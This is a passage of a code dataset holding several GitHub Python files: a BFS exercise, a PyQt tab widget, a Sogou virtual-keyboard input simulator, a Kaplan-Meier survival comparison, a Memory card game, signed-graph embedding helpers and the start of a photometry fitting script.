visited[i]==k:\n print(i)\n flag=True\nif flag==False:\n print(-1)\n\n","repo_name":"Yoo-sumi/CodingTest","sub_path":"DFS_BFS_Review/Q15.py","file_name":"Q15.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2981672329","text":"from PyQt5.QtCore import QSize\nfrom PyQt5.QtWidgets import QTabBar, QToolButton\n\nfrom rare.utils.misc import icon\n\n\nclass MainTabBar(QTabBar):\n def __init__(self, parent=None):\n super(MainTabBar, self).__init__(parent=parent)\n self.setObjectName(\"MainTabBar\")\n font = self.font()\n font.setPointSize(font.pointSize() + 2)\n font.setBold(True)\n self.setFont(font)\n self.expanded = -1\n\n def tabSizeHint(self, index):\n size = super(MainTabBar, self).tabSizeHint(index)\n if index == self.expanded:\n offset = self.width()\n for index in range(self.count()):\n offset -= super(MainTabBar, self).tabSizeHint(index).width()\n size.setWidth(max(size.width(), size.width() + 
offset))\n return size\n\n\nclass TabButtonWidget(QToolButton):\n def __init__(self, button_icon: str, tool_tip: str, fallback_icon=None, parent=None):\n super(TabButtonWidget, self).__init__(parent=parent)\n self.setText(\"Icon\")\n self.setPopupMode(QToolButton.InstantPopup)\n self.setIcon(icon(button_icon, fallback_icon, scale_factor=1.25))\n self.setToolTip(tool_tip)\n self.setIconSize(QSize(25, 25))\n","repo_name":"Dummerle/Rare","sub_path":"rare/components/tabs/tab_widgets.py","file_name":"tab_widgets.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":538,"dataset":"github-code","pt":"40"} +{"seq_id":"35994024742","text":"import os\nimport psutil\nfrom config import M\nfrom config import PARAMS\nfrom window_impl import get_sogou_virtualkeyboard_window, get_virtualkeyboard_candarea\nimport time\nfrom keys import do, space, Enter, BackSpace, ctrl, shift\n\nstr9key = '123456789'\nstr26key = 'qwertyuiopasdfghjklzxcvbnm'\nsogou_virtual_keyboard_info = PARAMS['sogou_virtual_keyboard']\npinyin_26key_btn_pos_info = sogou_virtual_keyboard_info['pinyin_26key_btn_pos_info']\npinyin_9key_btn_pos_info = sogou_virtual_keyboard_info['pinyin_9key_btn_pos_info']\nkeyboard_layout = {}\n\n\ndef get_process_info(proc):\n pids = psutil.pids()\n pid = None\n for p in pids:\n try:\n p_name = psutil.Process(p)\n if p_name.name() == proc:\n pid = p_name.pid\n break\n except:\n pass\n return pid\n\n\ndef start_edit(proc):\n os.popen(proc)\n time.sleep(2)\n\n\ndef close_edit(proc):\n pid = get_process_info(proc)\n if pid:\n try:\n cmd = \"kill -9 \" + str(pid)\n os.popen(cmd)\n except:\n pass\n\n\ndef key_input(pinyin):\n if not pinyin or pinyin == '':\n return 0\n if pinyin == '*':\n do(BackSpace)\n time.sleep(0.01)\n return 0\n elif pinyin == '#':\n do(Enter)\n time.sleep(0.01)\n return 0\n elif pinyin == '&':\n do(space)\n time.sleep(0.01)\n return 0\n else:\n pinyin = pinyin.lower()\n do(pinyin)\n time.sleep(0.01)\n return 1\n\n\ndef delete_pinyin(pinyin):\n if not pinyin or pinyin == '':\n return\n else:\n for i in range(0, len(pinyin)):\n do(BackSpace)\n time.sleep(0.01)\n do(space)\n\n\ndef ctrl_shift():\n do(ctrl+shift)\n time.sleep(1)\n\n\ndef init_virtualkey_layout():\n global keyboard_layout\n for key in sogou_virtual_keyboard_info:\n if key == 'pinyin_9key_btn_pos_info':\n keyPosInfo = sogou_virtual_keyboard_info['pinyin_9key_btn_pos_info']\n keyNameStr = str9key\n interval = keyPosInfo['interval']\n keyBtnPos = keyPosInfo['key_btn_pos']\n lastPosX, lastPosY = 0, 0\n for i in range(len(keyNameStr)):\n single_btn = {}\n keyName = keyNameStr[i]\n if keyName not in keyBtnPos:\n btn_coord = (lastPosX + interval, lastPosY)\n else:\n btn_coord = keyBtnPos[keyName]\n lastPosX = btn_coord[0]\n lastPosY = btn_coord[1]\n keyboard_layout[keyName] = btn_coord\n elif key == 'pinyin_26key_btn_pos_info':\n keyPosInfo = sogou_virtual_keyboard_info['pinyin_26key_btn_pos_info']\n keyNameStr = str26key\n interval = keyPosInfo['interval']\n keyBtnPos = keyPosInfo['key_btn_pos']\n lastPosX, lastPosY = 0, 0\n for i in range(len(keyNameStr)):\n single_btn = {}\n keyName = keyNameStr[i]\n if keyName not in keyBtnPos:\n btn_coord = (lastPosX + interval, lastPosY)\n else:\n btn_coord = keyBtnPos[keyName]\n lastPosX = btn_coord[0]\n lastPosY = btn_coord[1]\n keyboard_layout[keyName] = btn_coord\n else:\n keyboard_layout[key] = sogou_virtual_keyboard_info[key]\n\n\ndef virtualkey_click_event(key_name, box):\n # box = get_sogou_virtualkeyboard_window('Sogou')\n 
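# keyboard_layout stores each key as a relative (x, y) ratio; scale by the window geometry to get absolute click coordinates\n    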
click_button = (int(box.x + box.width * keyboard_layout[key_name][0]),\n int(box.y + box.height * keyboard_layout[key_name][1]))\n M.click(click_button[0], click_button[1])\n\n\ndef virtualkey_input(pinyin, keyboardtype):\n if not pinyin or pinyin == '':\n return 0\n box = get_sogou_virtualkeyboard_window('Sogou')\n if pinyin == '*':\n virtualkey_click_event('backspace_' + str(keyboardtype), box)\n time.sleep(0.01)\n return 0\n elif pinyin == '#':\n virtualkey_click_event('enter_' + str(keyboardtype), box)\n time.sleep(0.01)\n return 0\n elif pinyin == '&':\n # virtualkey_click_event('Space_' + str(keyboardtype), box)\n time.sleep(0.01)\n return 2\n else:\n if str(keyboardtype).endswith('eng'):\n for p in pinyin:\n if p.isupper():\n virtualkey_click_event('shift_26', box)\n time.sleep(0.005)\n virtualkey_click_event(p.lower(), box)\n else:\n virtualkey_click_event(p, box)\n time.sleep(0.005)\n time.sleep(0.01)\n else:\n pinyin = pinyin.lower()\n for i in range(0, len(pinyin)):\n virtualkey_click_event(pinyin[i], box)\n time.sleep(0.005)\n time.sleep(0.01)\n return 1\n\n\ndef virtualkey_delete_pinyin(pinyin, keyboardtype):\n if not pinyin or pinyin == '':\n return\n else:\n box = get_sogou_virtualkeyboard_window('Sogou')\n for i in range(0, len(pinyin)):\n virtualkey_click_event('backspace_' + keyboardtype, box)\n time.sleep(0.005)\n\n\ndef virtualkey_click_cand(cand_list, index, name='Sogou'):\n cand_area = get_virtualkeyboard_candarea(name)\n width = cand_area[2] - cand_area[0]\n height = cand_area[3] - cand_area[1]\n posX = cand_list[index - 1]['pos']\n click_btn = (int(cand_area[0] + width * posX), int(cand_area[1] + height / 2))\n M.click(click_btn[0], click_btn[1])\n time.sleep(0.01)\n\n\ndef virtualkey_switch_keyboardtype(keyboard_type):\n box = get_sogou_virtualkeyboard_window('Sogou')\n virtualkey_click_event('switch_keyboard', box)\n time.sleep(1)\n if str(keyboard_type).endswith('key'):\n virtualkey_click_event(keyboard_type, box)\n elif str(keyboard_type).startswith('26') and str(keyboard_type).endswith('eng'):\n virtualkey_click_event('26key_eng', box)\n else:\n virtualkey_click_event(str(keyboard_type) + 'key', box)\n time.sleep(1)\n","repo_name":"mayuxing-git/Myuxing","sub_path":"EvaluationWithOCRForLinux/fake_input.py","file_name":"fake_input.py","file_ext":"py","file_size_in_byte":6066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71062615159","text":"from os import walk\nimport pandas as pd\nfrom tqdm import tqdm\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport os\n\nfrom lifelines import KaplanMeierFitter\n\nfrom lifelines import statistics as stats\n\ndef expand_across_timeline(df, main_name, total_size):\n pre_df = {\"Timeline\": [], main_name: [], f\"{main_name}_lower_0.95\": [], f\"{main_name}_upper_0.95\": []}\n prev_t = int(df[\"Timeline\"].iloc[0])\n prev_s = df[main_name].iloc[0]\n prev_l = df[f\"{main_name}_lower_0.95\"].iloc[0]\n prev_u = df[f\"{main_name}_upper_0.95\"].iloc[0]\n for i, row in df.iterrows():\n if i == 0:\n continue\n\n curr_t = int(row[\"Timeline\"])\n curr_s = row[main_name]\n curr_l = row[f\"{main_name}_lower_0.95\"]\n curr_u = row[f\"{main_name}_upper_0.95\"]\n\n multiplier = curr_t - prev_t\n\n pre_df[\"Timeline\"].extend(list(range(prev_t, prev_t + multiplier)))\n pre_df[main_name].extend([prev_s] * multiplier)\n pre_df[f\"{main_name}_lower_0.95\"].extend([prev_l] * multiplier)\n pre_df[f\"{main_name}_upper_0.95\"].extend([prev_u] * multiplier)\n\n prev_t = 
curr_t\n prev_s = curr_s\n prev_l = curr_l\n prev_u = curr_u\n \n missing_mult = total_size + 1 - len(pre_df[\"Timeline\"])\n pre_df[\"Timeline\"].extend(list(range(prev_t, prev_t + missing_mult)))\n pre_df[main_name].extend([prev_s] * missing_mult)\n pre_df[f\"{main_name}_lower_0.95\"].extend([prev_l] * missing_mult)\n pre_df[f\"{main_name}_upper_0.95\"].extend([prev_u] * missing_mult)\n return pd.DataFrame(pre_df)\n \n\n\n\ndef str_percentage_to_float(percentage):\n try:\n return float(percentage[:-1]) / 100\n except:\n return -1\n\ndef get_lifelines_format(df):\n indices = df[\"Index\"]\n died = df[\"Died\"]\n censored = df[\"Lost to Follow-up\"]\n final_index = -1 if len(indices) == 0 else indices.iloc[-1]\n \n T = []\n E = []\n \n for ((_, index), (_, cur_death), (_, cur_censored)) in zip(indices.iteritems(), died.iteritems(), censored.iteritems()):\n \n if index == final_index:\n cur_censored += df[\"Start\"].iloc[-1]\n \n T.extend([index] * (cur_death + cur_censored))\n E.extend([1] * cur_death + [0] * cur_censored)\n \n return pd.DataFrame({\"T\": T, \"E\": E})\n\nfor _, _, filenames in walk(snakemake.input[0]):\n filenames = filenames\n \npd_dict = {}\npd_dict_non_kmf = {}\n\nfor filename in tqdm(filenames):\n if filename[-3:] != \"csv\":\n continue\n splitted = filename.split(\"~\")\n flag = splitted[0]\n cancer = \"~\".join(splitted[1:-1])\n \n if cancer not in pd_dict:\n pd_dict[cancer] = {}\n pd_dict_non_kmf[cancer] = {}\n temp_df = pd.read_csv(f\"{snakemake.input[0]}/{filename}\", converters={\"Observed Cum\": str_percentage_to_float}, thousands=\",\")\n #temp_df = temp_df[temp_df[\"Observed Cum\"] != -1]\n temp_df = temp_df.astype({\"Died\": \"int32\", \"Lost to Follow-up\": \"int32\", \"Start\": \"int32\"})\n lifelines_format = get_lifelines_format(temp_df)\n \n pd_dict[cancer][flag] = (lifelines_format, temp_df.shape[0])\n\n\nlast_survival = {}\nos.makedirs(snakemake.output[0], exist_ok=True)\nfor cancer, v in tqdm(pd_dict.items()):\n\n \n\n plt.clf()\n kmf = KaplanMeierFitter()\n fig, ax = plt.subplots()\n \n for flag, (cur_df, size) in v.items():\n if cur_df.shape[0] == 0:\n continue\n kmf.fit(cur_df[\"T\"], event_observed=cur_df[\"E\"], label=flag)\n kmf.plot_survival_function(ax=ax)\n if cancer not in last_survival:\n last_survival[cancer] = {}\n temp_df = pd.concat([kmf.survival_function_, kmf.confidence_interval_], axis = 1)\n temp_df[\"Timeline\"] = kmf.timeline\n last_survival[cancer][flag] = expand_across_timeline(temp_df, flag, size)\n \n \n \"\"\"for cancer, sub_flag in cur_last_survival.items():\n for flag, surv_df in sub_flag.items():\"\"\"\n \n plt.savefig(f\"{snakemake.output[0]}/{cancer}.png\", dpi=600, bbox_inches=\"tight\")\n\nos.makedirs(snakemake.output[1], exist_ok=True)\nos.makedirs(snakemake.output[2], exist_ok=True)\nfor cur_cancer, flag_dict in last_survival.items():\n os.makedirs(f\"{snakemake.output[1]}/{cur_cancer}\", exist_ok=True)\n os.makedirs(f\"{snakemake.output[2]}/{cur_cancer}\", exist_ok=True)\n for cur_flag, cur_df in flag_dict.items():\n cur_df.to_csv(f\"{snakemake.output[1]}/{cur_cancer}/{cur_flag}.csv\", index=False)\n pd_dict[cur_cancer][cur_flag][0].to_csv(f\"{snakemake.output[2]}/{cur_cancer}/{cur_flag}.csv\", index=False)","repo_name":"ArmaanAhmed22/CompareCoCversusNonCoC","sub_path":"Pipeline/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"24501290196","text":"# implementation of card game 
- Memory\n\nimport simplegui\nimport random\n\n# helper function to initialize globals\ndef new_game():\n global deck, exposed, nTurns, state, cInd1, cInd2\n deck = [x for x in range(8)] * 2\n random.shuffle(deck)\n exposed = [False] * 16\n nTurns = 0\n state = 0\n cInd1, cInd2 = -1, -1\n \n\n \n# define event handlers\ndef mouseclick(pos):\n # add game state logic here\n global nTurns, state, cInd1, cInd2\n cardInd = list(pos)[0] // 50\n if not exposed[cardInd]:\n if state == 0:\n cInd1 = cardInd\n exposed[cInd1] = True\n state = 1\n elif state == 1:\n cInd2 = cardInd\n exposed[cInd2] = True\n state = 2\n nTurns += 1\n label.set_text(\"Turns = \" + str(nTurns))\n else:\n if deck[cInd1] != deck[cInd2]:\n exposed[cInd1], exposed[cInd2] = False, False\n cInd1, cInd2 = -1, -1\n cInd1 = cardInd\n exposed[cInd1] = True\n state = 1\n\n \n \n \n# cards are logically 50x100 pixels in size \ndef draw(canvas):\n for i in range(16):\n if exposed[i]:\n canvas.draw_polygon([[i*50, 0], [(i+1)*50, 0], [(i+1)*50, 100], [i*50, 100]], 1, \"Black\", \"White\")\n canvas.draw_text(str(deck[i]), (i*50+15, 65), 50, \"Black\")\n else:\n canvas.draw_polygon([[i*50, 0], [(i+1)*50, 0], [(i+1)*50, 100], [i*50, 100]], 1, \"Black\", \"Teal\")\n label.set_text(\"Turns = \" + str(nTurns))\n \n# create frame and add a button and labels\nframe = simplegui.create_frame(\"Memory\", 800, 100)\nframe.add_button(\"Reset\", new_game)\nlabel = frame.add_label(\"Turns = 0\")\n\n# register event handlers\nframe.set_mouseclick_handler(mouseclick)\nframe.set_draw_handler(draw)\n\n# get things rolling\nnew_game()\nframe.start()\n\n\n# Always remember to review the grading rubric","repo_name":"linzifan/python_courses","sub_path":"IPP-Project-5-Memory.py","file_name":"IPP-Project-5-Memory.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"21214414235","text":"# -*- coding:utf-8 -*-\n# from numpy.random import shuffle as np_shuffle\n# from enum import _EnumDict\n\nimport numpy as np\nimport re\nfrom collections import defaultdict\nimport random\nimport datetime\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import roc_auc_score, f1_score, accuracy_score\nimport copy\n\n\nclass SignedGraph(object):\n def __init__(self, fpath, is_undiredted=True):\n self.G_pos = None\n self.G_neg = None\n self.edge_pos = None\n self.edge_neg = None\n\n self.node_all = set()\n self.read_signed_graph(fpath, is_undiredted)\n\n def read_signed_graph(self, fpath, is_undirected=False):\n '''\n\n :param fpath:\n :param is_undirected: add bidirectional edge\n :return: G_pos, G_neg\n '''\n G_pos = defaultdict(set)\n G_neg = defaultdict(set)\n edge_pos = []\n edge_neg = []\n node_all = set()\n\n with open(fpath) as f:\n for line in f:\n if len(line) > 0 and line[0] == '#':\n continue\n else:\n res = re.split(r'\\s+', line.strip())\n source_node, target_node, sign = map(int, res)\n\n node_all.add(source_node)\n node_all.add(target_node)\n\n if sign == 1:\n if target_node not in G_pos[source_node]:#remove repeated edge\n G_pos[source_node].add(target_node)\n edge_pos.append((source_node, target_node, sign))\n if is_undirected:\n if source_node not in G_pos[target_node]:\n G_pos[target_node].add(source_node)\n edge_pos.append((target_node, source_node, sign))\n\n elif sign == -1:\n if target_node not in G_neg[source_node]:\n G_neg[source_node].add(target_node)\n edge_neg.append((source_node, target_node, sign))\n if is_undirected:\n if 
source_node not in G_neg[target_node]:\n G_neg[target_node].add(source_node)\n edge_neg.append((target_node, source_node, sign))\n else:\n print('unknown sign:', sign)\n exit(-1)\n\n self.G_pos = G_pos\n self.G_neg = G_neg\n self.edge_pos = edge_pos\n self.edge_neg = edge_neg\n self.node_all = node_all\n\n return G_pos, G_neg\n\n\n\ndef signet_read_edge_info(fpath):\n edge_list = []\n with open(fpath) as f:\n for line in f:\n if line[0] != '#':\n s, t, sign = map(int, re.split(r'\\s+', line.strip()))\n edge_list.append([s, t, sign])\n\n return edge_list\n\ndef signet_save_edge_info(edge_list, fpath):\n with open(fpath, 'w') as f:\n for edge in edge_list:\n s = ' '.join(map(str, edge)) + '\\n'\n f.write(s)\n\ndef BESIDE_trans_emb_to_xy(aux_parameter, edge_tuples, mode_choose):\n '''\n from emb and parameters to feature\n return [x,y]\n '''\n X = []\n Y = []\n epoch_emb, wi, wj, bedge, sta_w1_source, sta_w1_target, sta_b1_source, sta_b1_target, sta_w_for_score, sta_b_for_score,sta_w_for_score_combined, sta_b_for_score_combined = aux_parameter\n\n for edge in edge_tuples:\n # e.g. [1,3,-1]\n y = edge[2] if edge[2] == 1 else 0 # 1->1,-1->0\n emb_1 = np.array(epoch_emb[edge[0]])\n emb_2 = np.array(epoch_emb[edge[1]])\n\n triad_emb_edge = np.matmul(emb_1, wi) + np.matmul(emb_2, wj) + bedge\n\n\n sta_source_fea_emb = np.matmul(emb_1, sta_w1_source) + sta_b1_source\n sta_target_fea_emb = np.matmul(emb_2, sta_w1_target) + sta_b1_target\n status_fea_vec = sta_source_fea_emb - sta_target_fea_emb\n\n if mode_choose == 'tri_sta':\n final_fea = np.zeros(shape=len(triad_emb_edge) + len(status_fea_vec))\n final_fea[:len(triad_emb_edge)] = triad_emb_edge\n final_fea[len(triad_emb_edge):len(triad_emb_edge) + len(status_fea_vec)] = status_fea_vec\n\n elif mode_choose == 'tri':\n final_fea = triad_emb_edge\n\n else:\n print('unknown mode_choose:{}', mode_choose)\n exit()\n\n X.append(final_fea)\n Y.append(y)\n return np.array(X), np.array(Y)\n\n\n \ndef BESIDE_check_link_prediction_task(dataset_train_fpath, dataset_test_fpath, sub_log_fpath, epoch_no, aux_parameter,\n mode_choose, extra_info=None):\n '''\n different mode_choose -> report performance of different tasks\n\n '''\n\n\n edge_method = '(xiWi+xjWj+b)' # 'l2_weight'#'l1_weight'# 'hadamard' #\n\n\n edge_train = signet_read_edge_info(dataset_train_fpath)\n edge_test = signet_read_edge_info(dataset_test_fpath)\n\n\n if mode_choose == 'sta': # compare directly\n epoch_emb, Wi, Wj, bedge, sta_w1_source, sta_w1_target, sta_b1_source, sta_b1_target, sta_w_for_score, sta_b_for_score,sta_w_for_score_combined, sta_b_for_score_combined = aux_parameter\n\n def get_source_score(node):\n tmp_emb = epoch_emb[node]\n return np.matmul(np.matmul(tmp_emb,sta_w1_source) + sta_b1_source,sta_w_for_score) + sta_b_for_score\n def get_target_score(node):\n tmp_emb = epoch_emb[node]\n return np.matmul(np.matmul(tmp_emb,sta_w1_target) + sta_b1_target,sta_w_for_score) + sta_b_for_score\n correct_num = 0\n total_num = len(edge_test)\n equal_num = 0\n for edge in edge_test:\n u, v, sign = edge\n sta_source_score_u = get_source_score(u)[0]\n sta_target_score_v = get_target_score(v)[0]\n if (sta_source_score_u < sta_target_score_v and sign == 1) or (sta_source_score_u > sta_target_score_v and sign == -1):\n correct_num += 1\n if sta_source_score_u == sta_target_score_v:\n equal_num += 1\n\n sta_cmp_acc = 1.0 * correct_num / total_num\n print(sub_log_fpath + '\\n{}:test epoch {}: acc {:.4f}({}/{}|equ={}) ({})\\n'.format(\n datetime.datetime.now().isoformat(), epoch_no, 
sta_cmp_acc,correct_num,total_num,equal_num ,edge_method))\n\n if extra_info:\n print('extra_info:', extra_info)\n print('writing result to', sub_log_fpath)\n\n with open(sub_log_fpath, 'a') as f:\n s = sub_log_fpath + '\\n{}:test epoch {}: acc {:.4f} ({})\\n'.format(\n datetime.datetime.now().isoformat(), epoch_no, sta_cmp_acc, edge_method)\n\n if extra_info:\n s += '{}\\n'.format(extra_info)\n\n f.write(s)\n else: #tri and tri_sta\n\n edge_train_emb_X, edge_train_emb_Y = BESIDE_trans_emb_to_xy(aux_parameter, edge_train, mode_choose)\n edge_test_emb_X, edge_test_emb_Y = BESIDE_trans_emb_to_xy(aux_parameter, edge_test, mode_choose)\n\n\n #train LR and test\n lr = LogisticRegression()\n lr.fit(edge_train_emb_X, edge_train_emb_Y)\n\n test_y_score = lr.predict_proba(edge_test_emb_X)[:, 1]\n\n test_y_pred = lr.predict(edge_test_emb_X)\n\n lp_auc_score = roc_auc_score(edge_test_emb_Y, test_y_score, average='macro')\n\n lp_f1_score_macro = f1_score(edge_test_emb_Y, test_y_pred, average='macro')\n lp_f1_score_micro = f1_score(edge_test_emb_Y, test_y_pred, average='micro')\n lp_acc = accuracy_score(edge_test_emb_Y, test_y_pred)\n\n\n print('{}:test epoch {}: auc {:.4f} f1_macro {:.4f} f1_micro {:.4f} acc {:.4f} ({})\\n'.format(\n datetime.datetime.now().isoformat(), epoch_no, lp_auc_score, lp_f1_score_macro, lp_f1_score_micro, lp_acc,\n edge_method))\n\n\n if extra_info:\n print('extra_info:', extra_info)\n print('writing result to', sub_log_fpath)\n\n with open(sub_log_fpath, 'a') as f:\n s = sub_log_fpath + '\\n{}:test epoch {}: auc {:.4f} f1_macro {:.4f} f1_micro {:.4f} acc {:.4f} ({})\\n'.format(\n datetime.datetime.now().isoformat(), epoch_no, lp_auc_score, lp_f1_score_macro, lp_f1_score_micro,\n lp_acc, edge_method)\n\n if extra_info:\n s += '{}\\n'.format(extra_info)\n\n f.write(s)\n\n\ndef BESIDE_sta_gen_batch(batch_size, edge_train, node_train_set, G_pos_train_ori, G_neg_train_ori):\n '''\n sample for bridge edges\n\n :return: (i,j,true_sign_ij)\n '''\n\n G_pos_train = copy.deepcopy(G_pos_train_ori)\n G_neg_train = copy.deepcopy(G_neg_train_ori)\n\n node_train_list = list(node_train_set)\n np.random.shuffle(node_train_list)\n\n edge_train_list = list(edge_train)\n np.random.shuffle(edge_train_list)\n\n for node, neis in G_pos_train_ori.items():\n if node in neis:\n G_pos_train[node].remove(node)\n\n for node, neis in G_neg_train_ori.items():\n if node in neis:\n G_neg_train[node].remove(node)\n\n\n\n bridge_edge_num = 0\n\n G_pos_train_rev = defaultdict(set)\n G_neg_train_rev = defaultdict(set)\n for cur_node, neis in G_pos_train.items():\n for nei in neis:\n G_pos_train_rev[nei].add(cur_node)\n for cur_node, neis in G_neg_train.items():\n for nei in neis:\n G_neg_train_rev[nei].add(cur_node)\n\n def remove_self_loop(G_dict):\n G_dict_copy = copy.deepcopy(G_dict)\n for node,neis in G_dict_copy.items():\n if node in neis:\n G_dict[node].remove(node)\n return G_dict\n\n G_pos_train = remove_self_loop(G_pos_train)\n G_neg_train = remove_self_loop(G_neg_train)\n G_pos_train_rev = remove_self_loop(G_pos_train_rev)\n G_neg_train_rev = remove_self_loop(G_neg_train_rev)\n\n\n cur_batch = []\n for edge_idx, edge in enumerate(edge_train_list):\n\n i, j, sign = edge\n\n true_sign = 1 if sign == 1 else 0\n\n if i == j:\n continue\n\n bak_nodes_i = G_pos_train[i].union(G_neg_train[i]).union(G_pos_train_rev[i]).union(G_neg_train_rev[i])\n bak_nodes_j = G_pos_train[j].union(G_neg_train[j]).union(G_pos_train_rev[j]).union(G_neg_train_rev[j])\n bak_k_nodes = bak_nodes_i.intersection(bak_nodes_j)\n\n if 
not bak_k_nodes: # `bridge' edge\n            bridge_edge_num += 1\n\n        cur_batch.append([i, j, true_sign])\n        if len(cur_batch) == batch_size:\n            yield np.array(cur_batch)\n            cur_batch = []\n\n    if len(cur_batch) > 0:\n        yield np.array(cur_batch)\n\n    # print('status:bridge_edge_num:{}'.format(bridge_edge_num))\n\n\n\n\ndef BESIDE_tri_gen_batch(batch_size, edge_train, node_train_set, G_pos_train_ori, G_neg_train_ori,\n                         max_one_edge_train_samples=16):\n    '''\n    sample for common edges (with triads)\n\n    :return: (i,j,i,k,j,k,sign_ij,sign_ik,sign_jk)\n    '''\n\n    G_pos_train = copy.deepcopy(G_pos_train_ori)\n    G_neg_train = copy.deepcopy(G_neg_train_ori)\n\n    node_train_list = list(node_train_set)\n    np.random.shuffle(node_train_list)\n\n    edge_train_list = list(edge_train)\n    np.random.shuffle(edge_train_list)\n\n\n\n    for node, neis in G_pos_train_ori.items():\n        if node in neis:\n            G_pos_train[node].remove(node)\n\n    for node, neis in G_neg_train_ori.items():\n        if node in neis:\n            G_neg_train[node].remove(node)\n\n    G_pos_train_rev = defaultdict(set)\n    G_neg_train_rev = defaultdict(set)\n    for cur_node, neis in G_pos_train.items():\n        for nei in neis:\n            G_pos_train_rev[nei].add(cur_node)\n    for cur_node, neis in G_neg_train.items():\n        for nei in neis:\n            G_neg_train_rev[nei].add(cur_node)\n\n    def remove_self_loop(G_dict):\n        G_dict_copy = copy.deepcopy(G_dict)\n        for node,neis in G_dict_copy.items():\n            if node in neis:\n                G_dict[node].remove(node)\n        return G_dict\n\n    G_pos_train = remove_self_loop(G_pos_train)\n    G_neg_train = remove_self_loop(G_neg_train)\n    G_pos_train_rev = remove_self_loop(G_pos_train_rev)\n    G_neg_train_rev = remove_self_loop(G_neg_train_rev)\n\n    return_batch = []\n\n    sampled_node_set = set()\n    actual_train_node_set = set()\n\n\n    for edge_idx, edge in enumerate(edge_train_list):\n        actual_train_node_set.add(edge[0])\n        actual_train_node_set.add(edge[1])\n\n        cur_batch = []\n\n        i, j, sign_ij = edge\n\n        if sign_ij == -1:\n            sign_ij = 0\n        else:\n            sign_ij = 1\n\n\n        if i == j:\n            continue\n\n        bak_nodes_i = G_pos_train[i].union(G_neg_train[i]).union(G_pos_train_rev[i]).union(G_neg_train_rev[i])\n        bak_nodes_j = G_pos_train[j].union(G_neg_train[j]).union(G_pos_train_rev[j]).union(G_neg_train_rev[j])\n        bak_k_nodes = bak_nodes_i.intersection(bak_nodes_j)\n        if not bak_k_nodes: # edges which do not have triads\n            continue\n\n        if len(bak_k_nodes) > max_one_edge_train_samples: # in case there are too many triads\n            bak_k_nodes = random.sample(list(bak_k_nodes), max_one_edge_train_samples)\n        else:\n            bak_k_nodes = list(bak_k_nodes)\n\n        for k in bak_k_nodes:\n            tmp_ik = (i, k)\n            tmp_jk = (j, k)\n            sign_ik = 1\n            sign_jk = 1\n            if k in G_pos_train[i]:\n                pass\n            elif k in G_neg_train[i]:\n                sign_ik = 0\n            elif k in G_pos_train_rev[i]:\n                tmp_ik = (k, i)\n            elif k in G_neg_train_rev[i]:\n                tmp_ik = (k, i)\n                sign_ik = 0\n\n            if k in G_pos_train[j]:\n                pass\n            elif k in G_neg_train[j]:\n                sign_jk = 0\n            elif k in G_pos_train_rev[j]:\n                tmp_jk = (k, j)\n            elif k in G_neg_train_rev[j]:\n                tmp_jk = (k, j)\n                sign_jk = 0\n            cur_batch.append([i, j, tmp_ik[0], tmp_ik[1], tmp_jk[0], tmp_jk[1], sign_ij, sign_ik, sign_jk])\n\n        for one_strip in cur_batch:\n            sampled_node_set.add(one_strip[0])\n            sampled_node_set.add(one_strip[1])\n            if len(return_batch) == batch_size:\n                yield np.array(return_batch)\n                return_batch = []\n            return_batch.append(one_strip)\n\n    if len(return_batch) > 0:\n        yield np.array(return_batch)\n\n\n\ndef signet_read_node_info(dataset_nodes_fpath):\n    node_set = set(np.loadtxt(dataset_nodes_fpath, dtype=np.int32))\n    return node_set\n\ndef 
signet_read_train_edge(dataset_train_fpath, dataset_nodes_fpath):\n edge_train = signet_read_edge_info(dataset_train_fpath)\n node_all_set = signet_read_node_info(dataset_nodes_fpath)\n\n G_pos_train = defaultdict(set)\n G_neg_train = defaultdict(set)\n node_train_set = set()\n\n for edge in edge_train:\n source_node, target_node, sign = edge\n if sign == 1:\n G_pos_train[source_node].add(target_node)\n elif sign == -1:\n G_neg_train[source_node].add(target_node)\n else:\n print('unknown sign:', sign)\n exit(-1)\n node_train_set.add(source_node)\n\n\n node_num = max(node_all_set) + 1 # in case the embedding lookup index out of range\n\n return node_train_set, G_pos_train, G_neg_train, node_num\n\n\ndef stacmp_read_train_edge(dataset_train_fpath, dataset_nodes_fpath):\n edge_train = signet_read_edge_info(dataset_train_fpath)\n node_all_set = signet_read_node_info(dataset_nodes_fpath)\n \n G_pos_train = defaultdict(set)\n G_neg_train = defaultdict(set)\n node_train_set = set()\n\n for edge in edge_train:\n source_node, target_node, sign = edge\n if sign == 1:\n G_pos_train[source_node].add(target_node)\n elif sign == -1:\n G_neg_train[source_node].add(target_node)\n else:\n print('unknown sign:', sign)\n exit(-1)\n node_train_set.add(source_node)\n\n node_num = max(node_all_set) + 1\n\n return node_train_set, G_pos_train, G_neg_train, node_num\n","repo_name":"yqc01/BESIDE","sub_path":"data_helper.py","file_name":"data_helper.py","file_ext":"py","file_size_in_byte":16058,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"40"} +{"seq_id":"33778532673","text":"\nimport os\nimport glob\nimport subprocess\nimport time\n\nfrom astropy.table import Table\n\nbegin = time.time()\n\nclusters = ['m416'] # ['a370', 'a1063', 'a2744', 'm416', 'm717', 'm1149']\nfor cluster in clusters :\n outDir = '{}/h5'.format(cluster)\n filterFile = '{}/{}_filters.txt'.format(cluster, cluster)\n photometries = '{}/photometry/{}_ID_2876_photometry.fits'.format(cluster,\n cluster)\n \n os.makedirs(outDir, exist_ok=True) # ensure the output directory for the\n # results is available\n \n # get a list of fits files containing photometric data for all bins for\n # a given galaxy, as denoted by ID\n phot_files = glob.glob(photometries)\n \n # loop over all the fits files in the directory\n for file in phot_files :\n ID = file.split('_')[2] # the galaxy ID to fit the bins for\n table = Table.read(file)\n bins = table['bin'] # get a list of bin values\n \n # create the output directory for the given galaxy\n outGal = '{}/{}'.format(outDir, ID)\n os.makedirs(outGal, exist_ok=True)\n \n for binNum in [10] : #bins : # loop over all the bins in the 